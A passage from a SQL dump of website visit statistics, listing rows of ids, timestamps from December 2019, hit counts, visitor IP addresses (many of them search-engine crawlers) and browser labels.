1,0,0,'66.249.64.26','chrome'),(470685,1577089280,1,1,0,0,'157.55.39.215','other'),(470686,1577089437,1,1,0,0,'66.249.64.26','chrome'),(470687,1577089594,1,1,0,0,'66.249.70.62','chrome'),(470688,1577090017,1,1,0,0,'178.154.171.134','other'),(470689,1577090049,1,1,0,0,'66.249.70.36','chrome'),(470690,1577091000,1,1,0,0,'8.29.198.26','other'),(470691,1577091055,2,2,0,0,'178.154.171.134','other'),(470692,1577091310,1,1,0,0,'91.196.178.66','chrome'),(470693,1577091314,1,1,0,0,'37.53.90.175','chrome'),(470694,1577091389,1,1,0,0,'46.133.17.45','chrome'),(470695,1577091537,1,1,0,0,'8.29.198.27','other'),(470696,1577092249,1,1,0,0,'194.1.195.225','chrome'),(470697,1577094718,1,1,0,0,'18.216.204.49','chrome'),(470698,1577094796,2,2,0,0,'178.154.171.134','other'),(470699,1577095258,1,1,0,0,'31.13.127.5','other'),(470700,1577095260,1,1,0,0,'31.13.127.10','other'),(470701,1577095332,1,1,0,0,'91.196.178.71','chrome'),(470702,1577095455,1,1,0,0,'66.249.64.27','chrome'),(470703,1577095815,1,1,0,0,'141.8.142.2','other'),(470704,1577096354,2,1,1,0,'207.46.13.172',''),(470705,1577097031,2,2,0,0,'178.154.171.134','other'),(470706,1577097299,1,1,0,0,'91.196.178.176','chrome'),(470707,1577098057,1,1,0,0,'178.154.171.127','other'),(470708,1577098158,1,1,0,0,'66.249.64.27','chrome'),(470709,1577098200,1,1,0,0,'91.196.178.176','chrome'),(470710,1577098600,1,1,0,0,'91.196.178.189','chrome'),(470711,1577098680,2,2,0,0,'157.55.39.178','other'),(470712,1577099326,1,1,0,0,'207.46.13.172','other'),(470713,1577099418,1,1,0,0,'178.154.171.134','other'),(470714,1577100045,1,1,0,0,'109.74.154.72','chrome'),(470715,1577100784,1,1,0,0,'176.111.33.18','firefox'),(470716,1577101078,1,1,0,0,'157.55.39.4','other'),(470717,1577101100,1,1,0,0,'157.55.39.178','other'),(470718,1577101735,1,1,0,0,'91.196.178.189','chrome'),(470719,1577101866,2,2,0,0,'8.29.198.25','other'),(470720,1577102055,1,1,0,0,'37.53.89.92','chrome'),(470721,1577102152,2,2,0,0,'207.46.13.172','other'),(470722,1577102157,1,1,0,0,'157.55.39.178','other'),(470723,1577102502,1,1,0,0,'5.196.92.91','firefox'),(470724,1577102504,1,1,0,0,'94.23.58.212','firefox'),(470726,1577102832,1,1,0,0,'178.154.171.134','other'),(470727,1577103329,1,1,0,0,'91.196.178.66','chrome'),(470728,1577103344,1,1,0,0,'178.154.171.127','other'),(470729,1577103611,1,1,0,0,'157.55.39.215','other'),(470730,1577104177,1,1,0,0,'207.46.13.172','other'),(470731,1577104259,2,2,0,0,'91.209.11.236','other'),(470732,1577104771,1,1,0,0,'66.249.64.28','chrome'),(470733,1577104914,1,1,0,0,'66.249.64.27','chrome'),(470734,1577105435,2,2,0,0,'91.209.11.236','other'),(470735,1577105687,1,1,0,0,'178.154.171.127','other'),(470736,1577105984,1,1,0,0,'91.196.178.169','chrome'),(470737,1577106158,1,1,0,0,'157.55.39.4','other'),(470738,1577106528,1,1,0,0,'66.249.64.28','chrome'),(470739,1577106550,1,1,0,0,'91.209.11.236','other'),(470740,1577107072,1,1,0,0,'157.55.39.178','other'),(470741,1577108508,2,0,2,0,'157.55.39.4',''),(470742,1577108528,1,1,0,0,'91.196.178.36','other'),(470743,1577109583,1,1,0,0,'116.202.26.179','other'),(470744,1577109689,1,1,0,0,'95.132.50.144','chrome'),(470745,1577110390,2,2,0,0,'31.13.127.11','other'),(470746,1577110415,1,1,0,0,'157.55.39.215','other'),(470747,1577110624,1,1,0,0,'66.249.64.27','chrome'),(470748,1577110681,2,2,0,0,'66.249.64.26','chrome'),(470749,1577110694,1,1,0,0,'91.196.177.46','chrome'),(470750,1577110742,1,1,0,0,'91.196.178.66','chrome'),(470751,1577111538,2,2,0,0,'157.55.39.215','other'),(470752,1577112193,1,1,0,0,'91.196.178.66','chrome'),(470753,1577112231,1,1,0,0,'178.154.171.134','other'),(470754,1577112270,1,1,0,0,'141.8.142.2','other'),(470755,1577112716,2,2,0,0,'8.29.198.27','other'),(470756,1577114063,1,1,0,0,'157.55.39.178','other'),(470757,1577114403,1,1,0,0,'178.154.171.134','other'),(470758,1577114408,1,1,0,0,'66.249.70.33','chrome'),(470759,1577115453,2,2,0,0,'66.249.64.26','chrome'),(470760,1577116480,1,1,0,0,'54.208.102.37','other'),(470761,1577116482,1,1,0,0,'107.21.1.8','other'),(470762,1577117079,2,2,0,0,'157.55.39.215','other'),(470763,1577117541,3,3,0,0,'178.154.171.134','other'),(470764,1577117913,1,1,0,0,'157.55.39.178','other'),(470765,1577118495,1,1,0,0,'178.154.171.134','other'),(470766,1577118701,1,1,0,0,'66.249.64.26','chrome'),(470767,1577119422,1,1,0,0,'66.249.70.33','chrome'),(470768,1577119635,2,2,0,0,'178.154.171.127','other'),(470769,1577120057,1,1,0,0,'157.55.39.178','other'),(470770,1577120459,1,1,0,0,'66.249.64.28','chrome'),(470771,1577121272,1,1,0,0,'66.249.64.27','chrome'),(470772,1577121325,1,1,0,0,'178.154.171.127','other'),(470773,1577121658,1,1,0,0,'66.249.64.28','chrome'),(470774,1577122282,2,2,0,0,'178.154.171.134','other'),(470775,1577122363,1,1,0,0,'87.250.224.90','other'),(470776,1577122477,1,1,0,0,'37.9.113.33','other'),(470777,1577123591,2,2,0,0,'8.29.198.26','other'),(470778,1577123698,1,1,0,0,'157.55.39.215','other'),(470779,1577124234,1,1,0,0,'66.249.64.26','chrome'),(470780,1577124912,2,0,2,0,'157.55.39.215',''),(470781,1577125116,1,1,0,0,'157.55.39.178','other'),(470782,1577125341,1,1,0,0,'178.154.171.134','other'),(470783,1577126316,1,1,0,0,'157.55.39.178','other'),(470784,1577126349,3,3,0,0,'178.154.171.134','other'),(470785,1577126848,1,1,0,0,'66.249.64.27','chrome'),(470786,1577127227,1,1,0,0,'116.202.26.179','other'),(470787,1577127477,1,1,0,0,'66.249.64.28','chrome'),(470788,1577127596,2,2,0,0,'178.154.171.134','other'),(470789,1577128506,1,1,0,0,'178.154.171.134','other'),(470790,1577129286,1,1,0,0,'91.196.178.48','chrome'),(470791,1577130197,1,1,0,0,'46.211.43.87','chrome'),(470792,1577130430,1,1,0,0,'178.154.171.134','other'),(470793,1577130436,1,1,0,0,'66.249.64.26','chrome'),(470794,1577130989,1,1,0,0,'46.18.0.126','chrome'),(470795,1577132502,1,1,0,0,'178.154.171.127','other'),(470796,1577132516,2,2,0,0,'95.213.141.126','opera'),(470797,1577132621,1,1,0,0,'141.8.183.111','other'),(470798,1577132700,1,0,1,0,'66.249.70.36',''),(470799,1577133378,1,1,0,0,'128.124.66.137','chrome'),(470800,1577133671,1,1,0,0,'141.8.142.164','other'),(470801,1577134167,1,1,0,0,'162.210.196.129','other'),(470802,1577134446,2,2,0,0,'8.29.198.25','other'),(470803,1577134871,1,1,0,0,'178.154.171.134','other'),(470804,1577137302,1,1,0,0,'178.154.171.134','other'),(470805,1577137337,1,1,0,0,'178.154.171.127','other'),(470806,1577137817,4,4,0,0,'66.249.64.27','chrome'),(470807,1577139369,1,1,0,0,'66.249.64.26','chrome'),(470808,1577139839,1,1,0,0,'66.249.64.28','chrome'),(470809,1577140182,1,1,0,0,'51.15.192.148','chrome'),(470810,1577140277,1,0,1,0,'147.135.170.169',''),(470811,1577140554,1,1,0,0,'66.249.64.26','chrome'),(470812,1577140692,1,1,0,0,'178.154.171.134','other'),(470813,1577141924,1,1,0,0,'66.249.70.33','chrome'),(470814,1577141972,1,1,0,0,'141.8.142.161','other'),(470815,1577141974,1,1,0,0,'66.249.64.27','chrome'),(470816,1577142090,1,1,0,0,'141.8.142.2','other'),(470817,1577142841,3,3,0,0,'91.209.11.236','other'),(470818,1577143951,1,1,0,0,'66.249.64.27','chrome'),(470819,1577144083,1,1,0,0,'37.9.113.163','other'),(470820,1577144141,1,1,0,0,'178.154.171.134','other'),(470821,1577144148,1,1,0,0,'141.8.142.2','other'),(470822,1577144231,1,1,0,0,'141.8.142.177','other'),(470823,1577144269,1,1,0,0,'91.209.11.236','other'),(470824,1577144274,1,1,0,0,'66.249.64.28','chrome'),(470825,1577145313,2,2,0,0,'8.29.198.27','other'),(470826,1577145595,1,1,0,0,'66.249.64.26','chrome'),(470827,1577146089,1,1,0,0,'207.46.13.66','other'),(470828,1577146876,1,1,0,0,'66.249.64.27','chrome'),(470829,1577147482,1,1,0,0,'13.66.139.0','other'),(470830,1577147706,1,1,0,0,'66.249.64.26','chrome'),(470831,1577147898,2,2,0,0,'178.154.171.134','other'),(470832,1577148913,1,1,0,0,'62.205.134.182','other'),(470833,1577150120,1,1,0,0,'178.154.171.127','other'),(470834,1577151119,1,1,0,0,'157.55.39.59','other'),(470835,1577152520,1,1,0,0,'178.154.171.134','other'),(470836,1577152684,1,1,0,0,'178.154.171.127','other'),(470837,1577154154,1,1,0,0,'66.249.64.28','chrome'),(470838,1577154239,1,1,0,0,'178.154.171.127','chrome'),(470839,1577154948,2,2,0,0,'178.154.171.127','other'),(470840,1577155249,1,1,0,0,'34.219.57.122','chrome'),(470841,1577155252,1,1,0,0,'35.162.70.167','other'),(470842,1577155293,1,1,0,0,'157.55.39.59','other'),(470843,1577155632,1,1,0,0,'66.249.64.27','chrome'),(470844,1577155988,1,1,0,0,'46.211.208.198','chrome'),(470845,1577156001,1,1,0,0,'46.211.151.165','firefox'),(470846,1577156159,1,1,0,0,'8.29.198.25','other'),(470847,1577156240,3,3,0,0,'178.154.171.134','other'),(470848,1577156864,1,1,0,0,'8.29.198.26','other'),(470849,1577157074,1,1,0,0,'66.249.64.28','chrome'),(470850,1577157790,1,1,0,0,'66.249.70.36','chrome'),(470851,1577159896,1,1,0,0,'66.249.70.36','chrome'),(470852,1577159904,1,1,0,0,'66.249.64.27','chrome'),(470853,1577160055,2,2,0,0,'178.154.171.134','other'),(470854,1577161203,1,1,0,0,'178.154.171.134','other'),(470855,1577161207,1,1,0,0,'141.8.142.2','other'),(470856,1577161237,2,2,0,0,'157.55.39.59','other'),(470857,1577161375,1,1,0,0,'66.249.64.27','chrome'),(470858,1577162232,1,1,0,0,'157.55.39.59','other'),(470859,1577162409,1,1,0,0,'178.154.171.134','other'),(470860,1577163636,2,2,0,0,'91.209.11.236','other'),(470861,1577164252,1,1,0,0,'157.55.39.59','other'),(470862,1577164667,1,1,0,0,'178.154.171.127','other'),(470863,1577164730,1,1,0,0,'91.209.11.236','other'),(470864,1577164788,1,1,0,0,'66.249.64.28','chrome'),(470865,1577164854,1,1,0,0,'66.249.70.33','chrome'),(470866,1577165551,1,1,0,0,'13.66.139.0','other'),(470867,1577165899,2,2,0,0,'66.249.64.26','chrome'),(470868,1577165983,1,1,0,0,'178.154.171.127','other'),(470869,1577166118,1,1,0,0,'62.205.134.182','other'),(470870,1577166292,1,1,0,0,'114.102.130.141','chrome'),(470871,1577167005,1,1,0,0,'8.29.198.27','other'),(470872,1577167149,1,1,0,0,'17.58.101.25','other'),(470873,1577167434,1,1,0,0,'178.154.171.127','other'),(470874,1577167499,1,1,0,0,'178.154.171.134','other'),(470875,1577167720,1,1,0,0,'8.29.198.25','other'),(470876,1577168345,1,1,0,0,'157.55.39.59','other'),(470877,1577168937,1,1,0,0,'66.249.64.27','chrome'),(470878,1577169726,1,1,0,0,'178.154.171.134','other'),(470879,1577171229,1,1,0,0,'91.196.178.92','firefox'),(470880,1577171694,1,1,0,0,'178.154.171.134','other'),(470881,1577172143,1,1,0,0,'91.196.178.92','firefox'),(470882,1577172616,2,2,0,0,'78.111.185.18','chrome'),(470883,1577172777,1,0,1,0,'66.249.64.26',''),(470884,1577172799,1,1,0,0,'66.249.64.27','chrome'),(470885,1577172863,1,1,0,0,'178.154.171.134','other'),(470886,1577172945,1,1,0,0,'66.249.64.28','chrome'),(470887,1577173007,1,1,0,0,'185.181.37.38','other'),(470888,1577173129,1,1,0,0,'185.181.37.38','chrome'),(470889,1577173321,1,1,0,0,'149.154.161.13','other'),(470890,1577173461,1,1,0,0,'91.196.178.169','chrome'),(470891,1577174711,1,1,0,0,'157.55.39.59','other'),(470892,1577174855,1,1,0,0,'178.154.171.134','other'),(470893,1577175099,1,1,0,0,'66.249.64.26','chrome'),(470894,1577175520,1,1,0,0,'66.249.64.27','chrome'),(470895,1577176788,1,1,0,0,'66.249.64.26','chrome'),(470896,1577177874,1,1,0,0,'8.29.198.26','other'),(470897,1577178239,3,3,0,0,'178.154.171.134','other'),(470898,1577178589,1,1,0,0,'8.29.198.25','other'),(470899,1577179161,2,2,0,0,'178.154.171.134','other'),(470900,1577179878,2,2,0,0,'66.249.64.28','chrome'),(470901,1577180115,6,6,0,0,'66.249.64.26','chrome'),(470902,1577180166,1,1,0,0,'66.249.64.27','chrome'),(470903,1577180250,1,1,0,0,'178.154.171.134','other'),(470904,1577180546,1,1,0,0,'66.249.70.33','chrome'),(470905,1577180911,1,1,0,0,'66.249.64.28','chrome'),(470906,1577181310,1,1,0,0,'178.154.171.134','other'),(470907,1577181945,2,2,0,0,'66.249.70.33','chrome'),(470908,1577182028,2,2,0,0,'66.249.64.26','chrome'),(470909,1577182030,4,4,0,0,'66.249.64.27','chrome'),(470910,1577182137,2,2,0,0,'66.249.64.28','chrome'),(470911,1577182182,1,1,0,0,'54.153.87.135','chrome'),(470912,1577182188,1,1,0,0,'52.53.253.104','chrome'),(470913,1577182189,9,9,0,0,'13.52.182.103','chrome'),(470914,1577182373,1,1,0,0,'178.154.171.134','other'),(470915,1577182675,1,1,0,0,'18.222.213.176','chrome'),(470916,1577183207,1,1,0,0,'66.249.64.27','chrome'),(470917,1577183289,2,2,0,0,'66.249.64.26','chrome'),(470918,1577183371,2,2,0,0,'91.196.177.46','chrome'),(470919,1577184229,2,2,0,0,'66.249.64.26','chrome'),(470920,1577184338,2,2,0,0,'66.249.64.27','chrome'),(470921,1577184732,1,1,0,0,'157.55.39.119','other'),(470922,1577184918,1,1,0,0,'91.196.177.46','chrome'),(470923,1577185304,1,1,0,0,'66.249.64.27','chrome'),(470924,1577185996,1,1,0,0,'157.55.39.119','other'),(470925,1577186131,1,1,0,0,'94.23.58.212','firefox'),(470926,1577186148,2,2,0,0,'130.180.220.250','chrome'),(470927,1577186277,1,1,0,0,'109.74.154.72','chrome'),(470928,1577186399,2,2,0,0,'178.154.171.134','other'),(470929,1577188267,2,2,0,0,'178.154.171.134','other'),(470930,1577188717,1,1,0,0,'66.249.64.28','chrome'),(470931,1577188736,1,1,0,0,'8.29.198.25','other'),(470932,1577189311,1,1,0,0,'141.8.132.2','other'),(470933,1577189461,1,1,0,0,'8.29.198.27','other'),(470934,1577189970,1,1,0,0,'66.249.64.27','chrome'),(470935,1577190086,1,1,0,0,'128.124.215.243','chrome'),(470936,1577190197,1,1,0,0,'66.249.64.28','chrome'),(470937,1577190545,1,1,0,0,'141.8.142.2','other'),(470938,1577191326,1,1,0,0,'66.249.64.28','chrome'),(470939,1577191862,1,1,0,0,'66.249.70.33','chrome'),(470940,1577191948,3,3,0,0,'116.202.26.179','other'),(470941,1577192384,1,1,0,0,'91.196.177.46','chrome'),(470942,1577194033,1,1,0,0,'141.8.183.100','other'),(470943,1577194140,1,1,0,0,'157.55.39.119','other'),(470944,1577194200,1,1,0,0,'178.154.171.134','other'),(470945,1577194429,1,1,0,0,'66.249.64.27','chrome'),(470946,1577194459,1,1,0,0,'51.15.247.217','chrome'),(470947,1577194480,1,1,0,0,'77.75.145.135','chrome'),(470948,1577194526,3,3,0,0,'116.202.26.179','other'),(470949,1577194576,1,1,0,0,'91.196.177.46','chrome'),(470950,1577194600,1,1,0,0,'66.249.64.26','chrome'),(470951,1577194740,1,1,0,0,'207.46.13.63','other'),(470952,1577195233,1,1,0,0,'141.8.188.25','other'),(470953,1577196291,1,1,0,0,'77.75.145.135','chrome'),(470954,1577196523,1,1,0,0,'178.154.171.134','other'),(470955,1577196879,1,1,0,0,'157.55.39.119','other'),(470956,1577198201,1,1,0,0,'66.249.64.26','chrome'),(470957,1577198297,1,1,0,0,'31.129.169.113','chrome'),(470958,1577198339,2,2,0,0,'207.46.13.63','other'),(470959,1577198550,1,1,0,0,'178.154.171.134','other'),(470960,1577198653,2,2,0,0,'176.108.106.2','chrome'),(470961,1577198981,1,1,0,0,'66.249.64.28','chrome'),(470962,1577199469,1,1,0,0,'178.154.171.127','other'),(470963,1577199507,1,1,0,0,'66.249.70.62','chrome'),(470964,1577199595,2,2,0,0,'8.29.198.26','other'),(470965,1577199946,1,1,0,0,'178.154.171.134','other'),(470966,1577200121,2,2,0,0,'66.249.64.27','chrome'),(470967,1577200725,2,2,0,0,'66.249.64.26','chrome'),(470968,1577202636,1,1,0,0,'178.154.171.134','other'),(470969,1577202683,1,1,0,0,'178.154.171.127','other'),(470970,1577203390,1,1,0,0,'78.106.248.138','other'),(470971,1577204989,1,1,0,0,'66.249.64.26','chrome'),(470972,1577205425,1,1,0,0,'66.249.64.27','chrome'),(470973,1577206136,1,1,0,0,'128.124.171.122','chrome'),(470974,1577206286,2,0,2,0,'157.55.39.119',''),(470975,1577206798,1,1,0,0,'178.154.171.134','other'),(470976,1577207870,1,1,0,0,'178.154.171.134','other'),(470977,1577207898,1,1,0,0,'178.154.171.127','other'),(470978,1577207903,1,1,0,0,'66.249.64.26','chrome'),(470979,1577209002,1,1,0,0,'141.8.142.50','other'),(470980,1577209045,1,1,0,0,'37.9.113.33','other'),(470981,1577210287,1,1,0,0,'178.154.171.127','other'),(470982,1577210460,1,1,0,0,'8.29.198.26','other'),(470983,1577210866,1,1,0,0,'66.249.64.26','chrome'),(470984,1577210958,1,1,0,0,'91.196.178.75','firefox'),(470985,1577211065,1,1,0,0,'66.249.64.28','chrome'),(470986,1577211183,1,1,0,0,'8.29.198.27','other'),(470987,1577211762,1,0,1,0,'66.249.70.62',''),(470988,1577212759,1,1,0,0,'141.8.188.25','other'),(470989,1577212802,1,1,0,0,'46.211.144.176','chrome'),(470990,1577213869,1,1,0,0,'141.8.142.177','other'),(470991,1577214133,1,0,1,0,'66.249.64.28',''),(470992,1577214145,1,1,0,0,'66.249.64.27','chrome'),(470993,1577215026,1,1,0,0,'95.108.181.104','other'),(470994,1577215070,1,1,0,0,'141.8.132.12','other'),(470995,1577215642,1,1,0,0,'66.249.70.62','chrome'),(470996,1577216072,2,0,2,0,'207.46.13.193',''),(470997,1577216100,1,1,0,0,'66.249.64.27','chrome'),(470998,1577216508,1,1,0,0,'37.9.113.33','other'),(470999,1577217250,1,1,0,0,'157.55.39.119','other'),(471000,1577217646,1,1,0,0,'66.249.64.27','chrome'),(471001,1577218319,1,1,0,0,'91.124.119.115','chrome'),(471002,1577218435,1,0,1,0,'66.249.70.62',''),(471003,1577219309,3,3,0,0,'207.46.13.63','other'),(471004,1577219415,1,1,0,0,'66.249.64.28','chrome'),(471005,1577220716,1,1,0,0,'141.8.188.25','other'),(471006,1577221002,2,2,0,0,'207.46.13.63','other'),(471007,1577221102,1,1,0,0,'66.249.64.27','chrome'),(471008,1577221293,1,1,0,0,'5.248.81.219','msie'),(471009,1577221310,2,2,0,0,'8.29.198.27','other'),(471010,1577221780,1,1,0,0,'207.46.13.193','other'),(471011,1577222809,1,1,0,0,'66.249.64.28','chrome'),(471012,1577224082,1,1,0,0,'66.249.64.28','chrome'),(471013,1577226695,2,2,0,0,'66.249.64.27','chrome'),(471014,1577227086,1,1,0,0,'207.46.13.63','other'),(471015,1577228419,1,1,0,0,'207.46.13.89','other'),(471016,1577229271,1,1,0,0,'209.17.97.58','other'),(471017,1577229761,1,1,0,0,'66.249.64.28','chrome'),(471018,1577229810,1,1,0,0,'141.8.183.100','other'),(471019,1577230241,1,1,0,0,'141.8.132.37','other'),(471020,1577230338,1,1,0,0,'66.249.64.27','chrome'),(471021,1577230339,1,1,0,0,'66.249.64.26','chrome'),(471022,1577230728,1,1,0,0,'66.249.64.28','chrome'),(471023,1577231843,2,2,0,0,'207.46.13.89','other'),(471024,1577232108,2,2,0,0,'207.46.13.63','other'),(471025,1577232150,2,2,0,0,'8.29.198.26','other'),(471026,1577232703,1,1,0,0,'95.108.213.55','other'),(471027,1577234420,1,1,0,0,'66.249.64.28','chrome'),(471028,1577234628,1,1,0,0,'66.249.70.62','chrome'),(471029,1577235123,2,2,0,0,'207.46.13.89','other'),(471030,1577235314,1,1,0,0,'62.205.134.182','other'),(471031,1577235525,2,0,2,0,'207.46.13.91',''),(471032,1577236042,25,25,0,0,'46.119.127.0','chrome'),(471033,1577236262,1,1,0,0,'66.249.64.27','chrome'),(471034,1577236792,2,0,2,0,'207.46.13.193',''),(471035,1577237120,2,2,0,0,'207.46.13.89','other'),(471036,1577237441,1,1,0,0,'141.8.132.28','other'),(471037,1577238660,1,1,0,0,'141.8.142.177','other'),(471038,1577239033,1,1,0,0,'207.46.13.89','other'),(471039,1577239509,1,1,0,0,'54.37.18.61','firefox'),(471040,1577241146,1,1,0,0,'37.9.113.163','other'),(471041,1577242313,1,1,0,0,'207.46.13.91','other'),(471042,1577242518,1,1,0,0,'207.46.13.193','other'),(471043,1577243011,1,1,0,0,'8.29.198.26','other'),(471044,1577243755,1,1,0,0,'8.29.198.25','other'),(471045,1577243777,1,1,0,0,'207.46.13.91','other'),(471046,1577244268,2,2,0,0,'141.8.132.2','other'),(471047,1577244294,1,1,0,0,'141.8.183.53','other'),(471048,1577246454,1,1,0,0,'66.249.64.28','chrome'),(471049,1577246928,1,1,0,0,'207.46.13.91','other'),(471050,1577247452,1,1,0,0,'66.249.64.27','chrome'),(471051,1577247717,1,1,0,0,'54.184.143.211','chrome'),(471052,1577247719,1,1,0,0,'52.41.211.72','other'),(471053,1577247762,1,1,0,0,'207.46.13.89','other'),(471054,1577248049,1,1,0,0,'141.8.183.100','other'),(471055,1577248071,1,1,0,0,'95.108.213.55','other'),(471056,1577248226,1,1,0,0,'141.8.132.19','other'),(471057,1577248360,1,1,0,0,'13.66.139.0','other'),(471058,1577249070,1,1,0,0,'207.46.13.129','other'),(471059,1577249562,1,1,0,0,'141.8.132.12','other'),(471060,1577249752,1,1,0,0,'207.46.13.91','other'),(471061,1577250893,1,1,0,0,'91.196.178.131','firefox'),(471062,1577251035,2,2,0,0,'66.249.64.27','chrome'),(471063,1577251397,1,1,0,0,'66.249.70.36','chrome'),(471064,1577251691,1,1,0,0,'66.249.64.28','chrome'),(471065,1577251800,1,1,0,0,'95.108.213.55','other'),(471066,1577252241,1,1,0,0,'207.46.13.129','other'),(471067,1577252426,1,1,0,0,'62.205.134.182','other'),(471068,1577253857,1,1,0,0,'8.29.198.25','other'),(471069,1577254222,3,3,0,0,'66.249.64.27','chrome'),(471070,1577254398,1,1,0,0,'207.46.13.89','other'),(471071,1577254624,1,1,0,0,'8.29.198.26','other'),(471072,1577255235,2,2,0,0,'178.154.171.134','other'),(471073,1577255354,22,22,0,0,'167.172.42.30','chrome'),(471074,1577255992,1,1,0,0,'209.17.96.178','other'),(471075,1577256402,1,1,0,0,'178.154.171.134','other'),(471076,1577257504,1,1,0,0,'178.154.171.134','other'),(471077,1577259446,1,1,0,0,'207.46.13.91','other'),(471078,1577260216,1,1,0,0,'178.154.171.134','other'),(471079,1577261061,1,1,0,0,'207.46.13.129','other'),(471080,1577262548,1,1,0,0,'178.154.171.134','other'),(471081,1577262880,1,1,0,0,'66.249.70.62','chrome'),(471082,1577263039,1,1,0,0,'66.249.64.26','chrome'),(471083,1577263788,1,1,0,0,'178.154.171.134','other'),(471084,1577264705,1,1,0,0,'8.29.198.27','other'),(471085,1577265307,1,1,0,0,'207.46.13.91','other'),(471086,1577265476,1,1,0,0,'8.29.198.26','other'),(471087,1577265927,2,2,0,0,'66.249.64.27','chrome'),(471088,1577266224,1,1,0,0,'13.66.139.0','other'),(471089,1577266461,1,1,0,0,'54.160.48.23','chrome'),(471090,1577268308,1,1,0,0,'207.46.13.89','other'),(471091,1577268761,1,1,0,0,'178.154.171.134','other'),(471092,1577268804,1,1,0,0,'91.196.178.184','chrome'),(471093,1577269680,1,1,0,0,'207.46.13.91','other'),(471094,1577269951,2,2,0,0,'178.154.171.134','other'),(471095,1577271122,2,2,0,0,'95.213.141.126','opera'),(471096,1577271301,1,1,0,0,'66.249.64.28','chrome'),(471097,1577271363,1,1,0,0,'178.154.171.134','other'),(471098,1577271577,1,1,0,0,'176.108.120.14','firefox'),(471099,1577271845,1,1,0,0,'207.46.13.89','other'),(471100,1577272483,22,22,0,0,'167.172.42.30','chrome'),(471101,1577272603,1,1,0,0,'66.249.70.36','chrome'),(471102,1577273629,1,1,0,0,'109.74.154.72','chrome'),(471103,1577274242,1,1,0,0,'178.154.171.127','other'),(471104,1577274845,2,2,0,0,'66.249.70.33','chrome'),(471105,1577275007,2,2,0,0,'207.46.13.89','other'),(471106,1577275549,2,2,0,0,'8.29.198.25','other'),(471107,1577276678,1,1,0,0,'207.46.13.91','other'),(471108,1577276720,2,2,0,0,'66.249.64.28','chrome'),(471109,1577277341,1,1,0,0,'207.46.13.89','other'),(471110,1577277541,1,1,0,0,'66.249.64.26','chrome'),(471111,1577278810,1,1,0,0,'66.249.64.26','chrome'),(471112,1577279391,1,1,0,0,'13.66.139.0','other'),(471113,1577279808,1,1,0,0,'207.46.13.91','other'),(471114,1577280205,1,1,0,0,'66.249.70.62','chrome'),(471115,1577280400,1,1,0,0,'193.106.30.99','firefox'),(471116,1577280616,1,1,0,0,'207.46.13.89','other'),(471117,1577281012,1,1,0,0,'141.8.183.67','other'),(471118,1577281045,1,1,0,0,'66.249.70.33','chrome'),(471119,1577281729,1,1,0,0,'66.249.64.27','chrome'),(471120,1577282029,1,1,0,0,'178.154.171.134','other'),(471121,1577282117,1,1,0,0,'193.105.62.239','chrome'),(471122,1577283260,1,1,0,0,'91.196.178.131','chrome'),(471123,1577283496,1,1,0,0,'66.249.64.27','chrome'),(471124,1577283886,1,1,0,0,'83.149.45.172','chrome'),(471125,1577284065,1,1,0,0,'207.46.13.91','other'),(471126,1577284391,1,1,0,0,'91.196.178.70','firefox'),(471127,1577284502,1,1,0,0,'178.154.171.134','other'),(471128,1577285281,1,1,0,0,'185.53.79.248','opera'),(471129,1577285343,1,1,0,0,'13.66.139.0','other'),(471130,1577285481,3,3,0,0,'207.46.13.89','other'),(471131,1577285603,2,2,0,0,'178.154.171.127','other'),(471132,1577285656,2,2,0,0,'66.249.64.26','chrome'),(471133,1577286074,1,1,0,0,'178.154.171.134','other'),(471134,1577286407,1,1,0,0,'8.29.198.25','other'),(471135,1577287201,1,1,0,0,'8.29.198.26','other'),(471136,1577287318,1,1,0,0,'66.249.64.28','chrome'),(471137,1577287382,1,1,0,0,'91.196.178.77','firefox'),(471138,1577287930,1,1,0,0,'13.66.139.0','other'),(471139,1577288093,3,3,0,0,'195.64.155.76','firefox'),(471140,1577288095,1,1,0,0,'195.64.155.76','chrome'),(471141,1577288191,1,1,0,0,'136.27.62.24','firefox'),(471142,1577288522,2,2,0,0,'178.154.171.134','other'),(471143,1577288998,1,1,0,0,'66.249.64.28','chrome'),(471144,1577289152,1,1,0,0,'207.46.13.91','other'),(471145,1577289482,1,1,0,0,'66.249.70.36','chrome'),(471146,1577289657,1,1,0,0,'207.46.13.89','other'),(471147,1577290080,1,1,0,0,'89.47.160.93','firefox'),(471148,1577290222,1,1,0,0,'178.154.171.134','other'),(471149,1577290350,1,1,0,0,'66.249.64.26','chrome'),(471150,1577290713,1,1,0,0,'66.249.64.28','chrome'),(471151,1577290995,2,2,0,0,'207.46.13.91','other'),(471152,1577291298,1,1,0,0,'178.154.171.134','other'),(471153,1577292134,1,1,0,0,'66.249.64.26','chrome'),(471154,1577292836,1,1,0,0,'178.154.171.134','other'),(471155,1577293018,1,1,0,0,'207.46.13.89','other'),(471156,1577293035,1,1,0,0,'66.249.70.62','chrome'),(471157,1577293306,1,1,0,0,'66.249.64.26','chrome'),(471158,1577293517,1,1,0,0,'51.68.152.26','chrome'),(471159,1577293948,3,3,0,0,'46.211.214.134','other'),(471160,1577294002,2,2,0,0,'66.249.64.28','chrome'),(471161,1577294144,2,2,0,0,'207.46.13.47','other'),(471162,1577294368,1,1,0,0,'31.13.127.11','other'),(471163,1577294370,1,1,0,0,'31.13.127.18','other'),(471164,1577295210,1,1,0,0,'66.249.64.27','chrome'),(471165,1577295336,1,1,0,0,'207.46.13.47','other'),(471166,1577295339,1,1,0,0,'66.249.64.26','chrome'),(471167,1577296358,1,1,0,0,'66.249.64.27','chrome'),(471168,1577296707,1,1,0,0,'66.249.64.26','chrome'),(471169,1577297260,2,2,0,0,'8.29.198.27','other'),(471170,1577297277,1,1,0,0,'178.154.171.134','other'),(471171,1577297601,1,1,0,0,'207.46.13.47','other'),(471172,1577297881,2,0,2,0,'207.46.13.59',''),(471173,1577297896,1,1,0,0,'31.13.127.20','other'),(471174,1577297897,1,1,0,0,'31.13.127.3','other'),(471175,1577298003,1,1,0,0,'78.106.248.138','other'),(471176,1577298249,1,1,0,0,'66.249.64.28','chrome'),(471177,1577298471,2,2,0,0,'178.154.171.134','other'),(471178,1577298828,1,1,0,0,'207.46.13.59','other'),(471179,1577298919,1,1,0,0,'66.249.64.27','chrome'),(471180,1577299516,1,1,0,0,'66.249.70.33','chrome'),(471181,1577299658,1,1,0,0,'178.154.171.134','other'),(471182,1577299660,1,1,0,0,'5.58.40.52','firefox'),(471183,1577299977,2,2,0,0,'207.46.13.59','other'),(471184,1577300201,1,0,1,0,'66.249.64.26',''),(471185,1577300240,1,1,0,0,'66.249.70.62','chrome'),(471186,1577300842,1,1,0,0,'66.249.64.26','chrome'),(471187,1577300849,1,1,0,0,'207.46.13.89','other'),(471188,1577302654,